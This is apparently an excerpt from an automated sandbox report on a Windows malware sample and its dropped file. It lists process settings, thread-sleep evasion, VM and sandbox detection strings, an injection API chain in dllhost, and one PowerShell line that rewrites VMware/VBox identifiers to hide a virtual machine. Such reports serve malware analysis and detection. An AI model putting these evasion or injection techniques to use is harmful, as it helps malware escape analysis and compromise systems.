                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77Kaxhwswfup.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\$77Kaxhwswfup.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\$77Kaxhwswfup.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\$77Kaxhwswfup.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\$77Kaxhwswfup.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\$77Kaxhwswfup.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\$77Kaxhwswfup.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\$77Kaxhwswfup.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\$77Kaxhwswfup.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\$77Kaxhwswfup.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\$77Kaxhwswfup.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\$77Kaxhwswfup.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\$77Kaxhwswfup.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\$77Kaxhwswfup.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\$77Kaxhwswfup.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\$77Kaxhwswfup.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\$77Kaxhwswfup.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\$77Kaxhwswfup.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\$77Kaxhwswfup.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\$77Kaxhwswfup.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\$77Kaxhwswfup.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\$77Kaxhwswfup.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\$77Kaxhwswfup.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\$77Kaxhwswfup.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\$77Kaxhwswfup.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\$77Kaxhwswfup.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\$77Kaxhwswfup.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\$77Kaxhwswfup.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\wbem\WMIADAP.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\wbem\WMIADAP.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\wbem\WMIADAP.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

                      Malware Analysis System Evasion

                      barindex
                      Source: Yara matchFile source: Process Memory Space: vm6XYZzWOd.exe PID: 6772, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: $77Kaxhwswfup.exe PID: 7056, type: MEMORYSTR
                      Source: C:\Windows\System32\dllhost.exeCode function: OpenProcess,IsWow64Process,CloseHandle,OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,NtCreateThreadEx,WaitForSingleObject,GetExitCodeThread,VirtualFreeEx,FindCloseChangeNotification,CloseHandle,7_2_0000000140001860
                      Source: vm6XYZzWOd.exe, 00000000.00000002.2300253783.00000000039B1000.00000004.00000800.00020000.00000000.sdmp, $77Kaxhwswfup.exe, 00000015.00000002.2746243713.0000000003728000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL0SELECT * FROM WIN32_BIOS8UNEXPECTED WMI QUERY FAILURE
                      Source: C:\Users\user\Desktop\vm6XYZzWOd.exeMemory allocated: 1DB0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\vm6XYZzWOd.exeMemory allocated: 3800000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\vm6XYZzWOd.exeMemory allocated: 1DB0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\vm6XYZzWOd.exeMemory allocated: 5E30000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\vm6XYZzWOd.exeMemory allocated: 6E30000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\vm6XYZzWOd.exeMemory allocated: 7E40000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\vm6XYZzWOd.exeMemory allocated: 8E40000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77Kaxhwswfup.exeMemory allocated: 1AF0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\$77Kaxhwswfup.exeMemory allocated: 3590000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\$77Kaxhwswfup.exeMemory allocated: 5590000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\$77Kaxhwswfup.exeMemory allocated: 5C40000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\$77Kaxhwswfup.exeMemory allocated: 6C40000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\vm6XYZzWOd.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77Kaxhwswfup.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5554Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3172Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeWindow / User API: threadDelayed 411Jump to behavior
                      Source: C:\Windows\System32\winlogon.exeWindow / User API: threadDelayed 7203Jump to behavior
                      Source: C:\Windows\System32\winlogon.exeWindow / User API: threadDelayed 2796Jump to behavior
                      Source: C:\Windows\System32\lsass.exeWindow / User API: threadDelayed 9976Jump to behavior
                      Source: C:\Windows\System32\dwm.exeWindow / User API: threadDelayed 9830Jump to behavior
                      Source: C:\Windows\System32\wbem\WMIADAP.exeWindow / User API: threadDelayed 2146
                      Source: C:\Windows\System32\wbem\WMIADAP.exeWindow / User API: threadDelayed 723
                      Source: C:\Windows\System32\dllhost.exeEvasive API call chain: RegOpenKey,DecisionNodes,ExitProcessgraph_7-8519
                      Source: C:\Users\user\AppData\Local\Temp\$77a3a3b4Evasive API call chain: RegOpenKey,DecisionNodes,ExitProcessgraph_3-245
                      Source: C:\Windows\System32\dllhost.exeEvasive API call chain: RegQueryValue,DecisionNodes,ExitProcessgraph_7-8526
                      Source: C:\Windows\System32\dllhost.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_7-8464
                      Source: C:\Windows\System32\lsass.exeAPI coverage: 6.7 %
                      Source: C:\Windows\System32\svchost.exeAPI coverage: 5.1 %
                      Source: C:\Windows\System32\svchost.exeAPI coverage: 5.0 %
                      Source: C:\Windows\System32\svchost.exeAPI coverage: 5.4 %
                      Source: C:\Windows\System32\svchost.exeAPI coverage: 5.1 %
                      Source: C:\Windows\System32\svchost.exeAPI coverage: 6.0 %
                      Source: C:\Windows\System32\svchost.exeAPI coverage: 5.0 %
                      Source: C:\Windows\System32\svchost.exeAPI coverage: 5.1 %
                      Source: C:\Windows\System32\svchost.exeAPI coverage: 5.4 %
                      Source: C:\Windows\System32\svchost.exeAPI coverage: 5.0 %
                      Source: C:\Users\user\Desktop\vm6XYZzWOd.exe TID: 5880Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1480Thread sleep count: 5554 > 30Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5504Thread sleep count: 3172 > 30Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4440Thread sleep time: -9223372036854770s >= -30000sJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2928Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Windows\System32\dllhost.exe TID: 4128Thread sleep count: 411 > 30Jump to behavior
                      Source: C:\Windows\System32\dllhost.exe TID: 4128Thread sleep time: -41100s >= -30000sJump to behavior
                      Source: C:\Windows\System32\dllhost.exe TID: 4768Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Windows\System32\winlogon.exe TID: 3504Thread sleep count: 7203 > 30Jump to behavior
                      Source: C:\Windows\System32\winlogon.exe TID: 3504Thread sleep time: -7203000s >= -30000sJump to behavior
                      Source: C:\Windows\System32\winlogon.exe TID: 3504Thread sleep count: 2796 > 30Jump to behavior
                      Source: C:\Windows\System32\winlogon.exe TID: 3504Thread sleep time: -2796000s >= -30000sJump to behavior
                      Source: C:\Windows\System32\lsass.exe TID: 2804Thread sleep count: 9976 > 30Jump to behavior
                      Source: C:\Windows\System32\lsass.exe TID: 2804Thread sleep time: -9976000s >= -30000sJump to behavior
                      Source: C:\Windows\System32\svchost.exe TID: 4408Thread sleep count: 246 > 30Jump to behavior
                      Source: C:\Windows\System32\svchost.exe TID: 4408Thread sleep time: -246000s >= -30000sJump to behavior
                      Source: C:\Windows\System32\dwm.exe TID: 3480Thread sleep count: 9830 > 30Jump to behavior
                      Source: C:\Windows\System32\dwm.exe TID: 3480Thread sleep time: -9830000s >= -30000sJump to behavior
                      Source: C:\Windows\System32\dwm.exe TID: 3480Thread sleep count: 32 > 30Jump to behavior
                      Source: C:\Windows\System32\dwm.exe TID: 3480Thread sleep time: -32000s >= -30000sJump to behavior
                      Source: C:\Windows\System32\svchost.exe TID: 6976Thread sleep count: 144 > 30Jump to behavior
                      Source: C:\Windows\System32\svchost.exe TID: 6976Thread sleep time: -144000s >= -30000sJump to behavior
                      Source: C:\Windows\System32\svchost.exe TID: 6112Thread sleep count: 144 > 30Jump to behavior
                      Source: C:\Windows\System32\svchost.exe TID: 6112Thread sleep time: -144000s >= -30000sJump to behavior
                      Source: C:\Windows\System32\svchost.exe TID: 7164Thread sleep count: 97 > 30Jump to behavior
                      Source: C:\Windows\System32\svchost.exe TID: 7164Thread sleep time: -97000s >= -30000sJump to behavior
                      Source: C:\Windows\System32\svchost.exe TID: 768Thread sleep count: 95 > 30Jump to behavior
                      Source: C:\Windows\System32\svchost.exe TID: 768Thread sleep time: -95000s >= -30000sJump to behavior
                      Source: C:\Windows\System32\svchost.exe TID: 984Thread sleep count: 207 > 30Jump to behavior
                      Source: C:\Windows\System32\svchost.exe TID: 984Thread sleep time: -207000s >= -30000sJump to behavior
                      Source: C:\Windows\System32\svchost.exe TID: 380Thread sleep count: 250 > 30Jump to behavior
                      Source: C:\Windows\System32\svchost.exe TID: 380Thread sleep time: -250000s >= -30000sJump to behavior
                      Source: C:\Windows\System32\svchost.exe TID: 320Thread sleep count: 74 > 30Jump to behavior
                      Source: C:\Windows\System32\svchost.exe TID: 320Thread sleep time: -74000s >= -30000sJump to behavior
                      Source: C:\Windows\System32\svchost.exe TID: 1576Thread sleep count: 77 > 30Jump to behavior
                      Source: C:\Windows\System32\svchost.exe TID: 1576Thread sleep time: -77000s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77Kaxhwswfup.exe TID: 1292Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\System32\svchost.exe TID: 3116Thread sleep count: 72 > 30
                      Source: C:\Windows\System32\svchost.exe TID: 3116Thread sleep time: -72000s >= -30000s
                      Source: C:\Windows\System32\svchost.exe TID: 5800Thread sleep count: 77 > 30
                      Source: C:\Windows\System32\svchost.exe TID: 5800Thread sleep time: -77000s >= -30000s
                      Source: C:\Windows\System32\svchost.exe TID: 5308Thread sleep count: 70 > 30
                      Source: C:\Windows\System32\svchost.exe TID: 5308Thread sleep time: -70000s >= -30000s
                      Source: C:\Windows\System32\svchost.exe TID: 5364Thread sleep count: 249 > 30
                      Source: C:\Windows\System32\svchost.exe TID: 5364Thread sleep time: -249000s >= -30000s
                      Source: C:\Windows\System32\svchost.exe TID: 5408Thread sleep count: 250 > 30
                      Source: C:\Windows\System32\svchost.exe TID: 5408Thread sleep time: -250000s >= -30000s
                      Source: C:\Windows\System32\svchost.exe TID: 2228Thread sleep count: 249 > 30
                      Source: C:\Windows\System32\svchost.exe TID: 2228Thread sleep time: -249000s >= -30000s
                      Source: C:\Windows\System32\svchost.exe TID: 3652Thread sleep count: 250 > 30
                      Source: C:\Windows\System32\svchost.exe TID: 3652Thread sleep time: -250000s >= -30000s
                      Source: C:\Windows\System32\svchost.exe TID: 3924Thread sleep count: 102 > 30
                      Source: C:\Windows\System32\svchost.exe TID: 3924Thread sleep time: -102000s >= -30000s
                      Source: C:\Windows\System32\svchost.exe TID: 1816Thread sleep count: 107 > 30
                      Source: C:\Windows\System32\svchost.exe TID: 1816Thread sleep time: -107000s >= -30000s
                      Source: C:\Windows\System32\svchost.exe TID: 6444Thread sleep count: 60 > 30
                      Source: C:\Windows\System32\svchost.exe TID: 6444Thread sleep time: -60000s >= -30000s
                      Source: C:\Windows\System32\svchost.exe TID: 5084Thread sleep count: 59 > 30
                      Source: C:\Windows\System32\svchost.exe TID: 5084Thread sleep time: -59000s >= -30000s
                      Source: C:\Windows\System32\svchost.exe TID: 5068Thread sleep count: 60 > 30
                      Source: C:\Windows\System32\svchost.exe TID: 5068Thread sleep time: -60000s >= -30000s
                      Source: C:\Windows\System32\svchost.exe TID: 6628Thread sleep count: 59 > 30
                      Source: C:\Windows\System32\svchost.exe TID: 6628Thread sleep time: -59000s >= -30000s
                      Source: C:\Windows\System32\wbem\WMIADAP.exe TID: 4196Thread sleep count: 2146 > 30
                      Source: C:\Windows\System32\wbem\WMIADAP.exe TID: 4196Thread sleep count: 723 > 30
                      Source: C:\Windows\System32\svchost.exe TID: 3660Thread sleep count: 59 > 30
                      Source: C:\Windows\System32\svchost.exe TID: 3660Thread sleep time: -59000s >= -30000s
                      Source: C:\Windows\System32\spoolsv.exe TID: 6592Thread sleep count: 94 > 30
                      Source: C:\Windows\System32\spoolsv.exe TID: 6592Thread sleep time: -94000s >= -30000s
                      Source: C:\Windows\System32\svchost.exe TID: 5844Thread sleep count: 51 > 30
                      Source: C:\Windows\System32\svchost.exe TID: 5844Thread sleep time: -51000s >= -30000s
                      Source: C:\Windows\System32\svchost.exe TID: 6048Thread sleep count: 54 > 30
                      Source: C:\Windows\System32\svchost.exe TID: 6048Thread sleep time: -54000s >= -30000s
                      Source: C:\Windows\System32\svchost.exe TID: 5852Thread sleep count: 50 > 30
                      Source: C:\Windows\System32\svchost.exe TID: 5852Thread sleep time: -50000s >= -30000s
                      Source: C:\Windows\System32\dllhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\dllhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\winlogon.exeLast function: Thread delayed
                      Source: C:\Windows\System32\winlogon.exeLast function: Thread delayed
                      Source: C:\Windows\System32\lsass.exeLast function: Thread delayed
                      Source: C:\Windows\System32\lsass.exeLast function: Thread delayed
                      Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\dwm.exeLast function: Thread delayed
                      Source: C:\Windows\System32\dwm.exeLast function: Thread delayed
                      Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\wbem\WMIADAP.exeLast function: Thread delayed
                      Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\spoolsv.exeLast function: Thread delayed
                      Source: C:\Windows\System32\spoolsv.exeLast function: Thread delayed
                      Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                      Source: C:\Users\user\AppData\Local\Temp\$778e373eCode function: 6_2_00FDB19B FindFirstFileExW,6_2_00FDB19B
                      Source: C:\Windows\System32\dllhost.exeCode function: 7_2_000001B094E9E09C FindFirstFileExW,7_2_000001B094E9E09C
                      Source: C:\Windows\System32\winlogon.exeCode function: 8_2_000001E85898E09C FindFirstFileExW,8_2_000001E85898E09C
                      Source: C:\Windows\System32\lsass.exeCode function: 9_2_00000140AE86E09C FindFirstFileExW,9_2_00000140AE86E09C
                      Source: C:\Windows\System32\svchost.exeCode function: 10_2_00000195DD5CE09C FindFirstFileExW,10_2_00000195DD5CE09C
                      Source: C:\Windows\System32\svchost.exeCode function: 12_2_00000257E10AE09C FindFirstFileExW,12_2_00000257E10AE09C
                      Source: C:\Windows\System32\svchost.exeCode function: 13_2_000001F28C93E09C FindFirstFileExW,13_2_000001F28C93E09C
                      Source: C:\Windows\System32\svchost.exeCode function: 14_2_000001CA9854E09C FindFirstFileExW,14_2_000001CA9854E09C
                      Source: C:\Windows\System32\svchost.exeCode function: 15_2_000001D26531E09C FindFirstFileExW,15_2_000001D26531E09C
                      Source: C:\Windows\System32\svchost.exeCode function: 16_2_00000254A2D4E09C FindFirstFileExW,16_2_00000254A2D4E09C
                      Source: C:\Windows\System32\svchost.exeCode function: 17_2_0000024B87DDE09C FindFirstFileExW,17_2_0000024B87DDE09C
                      Source: C:\Windows\System32\svchost.exeCode function: 18_2_00000205FD40E09C FindFirstFileExW,18_2_00000205FD40E09C
                      Source: C:\Windows\System32\svchost.exeCode function: 19_2_000001A2056AE09C FindFirstFileExW,19_2_000001A2056AE09C
                      Source: C:\Users\user\Desktop\vm6XYZzWOd.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77Kaxhwswfup.exeThread delayed: delay time: 922337203685477
                      Source: svchost.exe, 00000012.00000003.2447348502.00000205FBA12000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMwareVirtual disk2.06000c292b65879ff477a6af604113f58PCI Slot 32 : Bus 2 : Device 0 : Function 0 : Adapter 0 : Port 0 : Target 0 : LUN 0PCI\VEN_1000&DEV_0054&SUBSYS_197615AD&REV_01\3&218e0f40&0&00
                      Source: svchost.exe, 00000012.00000002.3586489469.00000205FAC2B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000012.00000000.2389115187.00000205FAC2B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: @Microsoft-Windows-Hyper-V-Hypervisor
                      Source: svchost.exe, 00000012.00000000.2389148210.00000205FAC43000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: (@vmci
                      Source: svchost.exe, 00000012.00000000.2390460443.00000205FB943000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00
                      Source: svchost.exe, 00000010.00000002.3574867559.00000254A202B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: zSCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000_0r
                      Source: svchost.exe, 00000012.00000000.2390460443.00000205FB943000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NECVMWarVMware SATA CD00
                      Source: svchost.exe, 00000012.00000000.2390460443.00000205FB943000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: LSI_SASVMware Virtual disk 6000c2942fce4d06663969f532e45d1a
                      Source: dwm.exe, 0000000B.00000000.2336959469.0000011607ED0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000=
                      Source: svchost.exe, 00000025.00000002.3574175847.000001C781F02000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: svchost.exe, 00000012.00000003.2468013769.00000205FBEAD000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware Virtual disk 2.0 6000c2942fce4d06663969f532e45d1aPCI\VEN_1000&DEV_0054&SUBSYS_197615AD&REV_01\3&218E0F40&0&00NTFS
                      Source: svchost.exe, 00000012.00000000.2390667937.00000205FBA00000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMwareVirtual disk6000c2942fce4d06663969f532e45d1ap
                      Source: svchost.exe, 00000012.00000000.2389029535.00000205FABD0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: $value = $pr.Value.replace("VBOX", $value).replace("VBox", $value).replace("VMWARE", $value).replace("VMware Virtual disk", $value).replace("VMware", $value).replace("HARDDISK", "WDC").replace("VIRTUAL_DISK", $value)
                      Source: svchost.exe, 00000025.00000002.3567852683.000001C781E40000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000
                      Source: svchost.exe, 00000012.00000000.2393227900.00000205FD300000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMCI: Using capabilities (0x1c).
